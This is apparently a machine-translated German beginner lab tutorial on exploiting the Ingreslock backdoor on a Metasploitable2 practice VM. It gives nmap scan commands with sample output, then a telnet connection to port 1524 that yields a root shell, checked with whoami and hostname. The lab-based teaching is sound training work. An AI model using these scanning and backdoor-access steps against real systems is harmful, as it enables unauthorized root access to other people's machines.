Angriff auf die Ingreslock-Backdoor-Schwachstelle

CybersecurityCybersecurityBeginner
Jetzt üben

💡 Dieser Artikel wurde von AI-Assistenten übersetzt. Um die englische Version anzuzeigen, können Sie hier klicken

Einführung

In diesem Lab lernen Sie, wie Sie die Schwachstelle des Ingreslock-Services ausnutzen können, um Root-Zugang zu einem Zielrechner zu erhalten. Die Lab-Umgebung basiert auf den virtuellen Maschinen Kali und Metasploitable2, die von LabEx bereitgestellt werden. Das Ziel dieses Labs besteht darin, die Ingreslock-Schwachstelle zu verstehen, einen Penetrationstest mit Nmap durchzuführen und schließlich über die Ausnutzung der Ingreslock-Backdoor Root-Zugang zur Metasploitable2-Maschine zu erhalten.

Das Verständnis der Ingreslock-Schwachstelle und die Einrichtung der Umgebung

Die Ingreslock-Schwachstelle ist eine alte, aber immer noch relevante Sicherheitslücke im Zusammenhang mit dem Ingres-Datenbankverwaltungssystem (DBMS, engl. Database Management System). Angreifer nutzen oft den TCP-Port 1524 als Backdoor-Port, um Zugang zu kompromittierten Systemen aufrechtzuerhalten.

In diesem Schritt lernen Sie die Ingreslock-Schwachstelle und ihre Auswirkungen kennen.

Die Ingreslock-Schwachstelle resultiert daraus, dass Angreifer den TCP-Port 1524 häufig als Backdoor-Lauscherport nutzten, nachdem sie ein System erfolgreich kompromittiert hatten. Die Einfachheit der Ausnutzung dieser Schwachstelle liegt darin, dass man einfach durch die Verbindung zu dem offenen Port Root-Zugang auf dem Zielrechner erhalten kann.

Obwohl diese Schwachstelle als alt angesehen wird, ist sie immer noch in einigen Legacy-Systemen vorhanden, was es lohnenswert macht, sie in einer kontrollierten Umgebung zu verstehen und zu erkunden.

  1. Öffnen Sie ein xfce-Terminal auf der LabEx-Hostmaschine und starten Sie die Metasploitable2-Zielmaschine, indem Sie den folgenden Befehl ausführen:
sudo virsh start Metasploitable2

Warten Sie, bis die Zielmaschine gestartet ist. Dies kann 1 - 3 Minuten dauern.

  1. Testen Sie die Konnektivität zur Zielmaschine, indem Sie sie per Ping testen:
ping 192.168.122.102

Drücken Sie Ctrl+C, um den Ping-Vorgang zu stoppen.

  1. Starten Sie den Kali Linux-Container und treten Sie in die bash-Umgebung ein, indem Sie folgenden Befehl ausführen:
docker run -ti --network host b5b709a49cd5 bash
  1. Testen Sie innerhalb des Kali-Containers die Netzwerkverbindung zur Zielmaschine:
ping 192.168.122.102

Drücken Sie Ctrl+C, um den Ping-Vorgang zu stoppen.

Durchführung eines Penetrationstests

In diesem Schritt führen Sie einen Penetrationstest auf der Metasploitable2-Zielmaschine mit Nmap durch, um offene Ports und laufende Dienste auf der Zielmaschine zu identifizieren.

  1. Starten Sie die virtuelle Metasploitable2-Maschine und stellen Sie sicher, dass sie läuft.
  2. Starten Sie den Kali-Container und treten Sie in die bash-Shell ein.
  3. Führen Sie innerhalb des Kali-Containers den folgenden Befehl aus, um einen umfassenden Scan auf der Zielmaschine durchzuführen:
nmap -sV -T4 target-ip-address

Die Option -sV weist Nmap an, offene Ports zu untersuchen, um Informationen über den Dienst und seine Version zu ermitteln, während -T4 die Timing-Vorlage auf ein aggressives Niveau setzt (höhere Werte von 0 bis 5 erhöhen die Aggressivität).

Starten Sie den PostgreSQL-Dienst und initialisieren Sie die Metasploit-Datenbank:

cd ~
service postgresql start
msfdb init

Starten Sie die Metasploit-Konsole:

msfconsole

Führen Sie einen umfassenden Scan auf der Zielmaschine durch:

nmap -sV -T4 192.168.122.102

Hier ist ein Beispiel für die Ausgabe, die Sie sehen könnten:

[*] exec: nmap -sV -T4 192.168.122.102

Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-24 20:47 UTC
Nmap scan report for 192.168.122.102
Host is up (0.0037s latency).
Not shown: 977 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp  open  exec?
513/tcp  open  login
514/tcp  open  shell?

...

Diese Reihe von Befehlen startet den PostgreSQL-Dienst, initialisiert die Metasploit-Datenbank, startet die Metasploit-Konsole und führt dann einen umfassenden Scan auf der Zielmaschine mit Nmap durch.

Drücken Sie Ctrl+D, um die Metasploit-Konsole zu beenden, und beginnen Sie dann die Prüfung.

Ausnutzung der Ingreslock-Backdoor

In diesem Schritt nutzen Sie die Schwachstelle der Ingreslock-Backdoor aus, um Root-Zugang zur Metasploitable2-Zielmaschine zu erhalten.

  1. Zunächst sollten Sie, wenn Sie nicht bereits in der Metasploit-Konsole sind, die Metasploit-Konsole starten:
cd ~
msfconsole
  1. Installieren Sie das telnet-Paket in der Metasploit-Konsole:
apt-key del ED444FF07D8D0BF6 && apt-key adv --keyserver keyserver.ubuntu.com --recv-keys ED444FF07D8D0BF6 && apt update && apt install telnet
  1. Verwenden Sie den telnet-Befehl, um eine Verbindung zum Ingreslock-Backdoor-Port auf der Zielmaschine herzustellen:
telnet 192.168.122.102 1524

Wenn die Verbindung erfolgreich ist, sollten Sie Root-Zugang zur Zielmaschine erhalten.

  1. Jetzt müssen Sie überprüfen, ob die Ausnutzung der Ingreslock-Backdoor erfolgreich war, indem Sie die IP-Adresse, den Hostnamen und den aktuellen Benutzer auf der kompromittierten Maschine überprüfen. Nachdem Sie über die Ingreslock-Backdoor eine Verbindung zur Zielmaschine hergestellt haben, führen Sie die folgenden Befehle aus:

Überprüfen Sie die IP-Adresse der kompromittierten Maschine:

ifconfig

Überprüfen Sie den Hostnamen der kompromittierten Maschine:

hostname

Überprüfen Sie den aktuellen Benutzer auf der kompromittierten Maschine:

whoami

Wenn die Ausnutzung erfolgreich war, sollten Sie die IP-Adresse, den Hostnamen und den aktuellen Benutzer als root auf der Zielmaschine sehen.

Drücken Sie Ctrl+D, um die Metasploit-Konsole zu beenden, und beginnen Sie dann die Prüfung.

Zusammenfassung

In diesem Lab haben Sie die Ingreslock-Schwachstelle kennengelernt, die es Angreifern ermöglicht, Root-Zugang zu kompromittierten Systemen zu erhalten, indem sie sich an den TCP-Port 1524 verbinden. Sie haben einen Penetrationstest mit Nmap durchgeführt, um offene Ports und Dienste auf der Zielmaschine zu identifizieren. Nachdem Sie den Ingreslock-Backdoor-Port entdeckt haben, haben Sie die Schwachstelle mit dem telnet-Befehl ausgenutzt, um Root-Zugang zu erhalten. Schließlich haben Sie die erfolgreiche Ausnutzung überprüft, indem Sie die IP-Adresse, den Hostnamen und den aktuellen Benutzer auf der kompromittierten Maschine überprüft haben. Dieses Lab hat Ihnen praktische Erfahrungen in der Erkennung und Ausnutzung einer realen Schwachstelle vermittelt und die Wichtigkeit von Sicherheitsupdates und der Härtung von Systemen gegen solche Backdoors betont.